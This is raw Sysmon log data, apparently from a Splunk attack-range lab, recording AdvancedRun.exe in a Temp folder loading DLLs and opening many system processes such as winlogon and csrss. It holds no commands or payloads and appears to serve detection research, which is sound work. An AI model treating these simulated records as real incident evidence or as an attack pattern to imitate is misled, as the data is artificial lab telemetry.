18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011091Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011090Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011088Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004009396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004009393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C: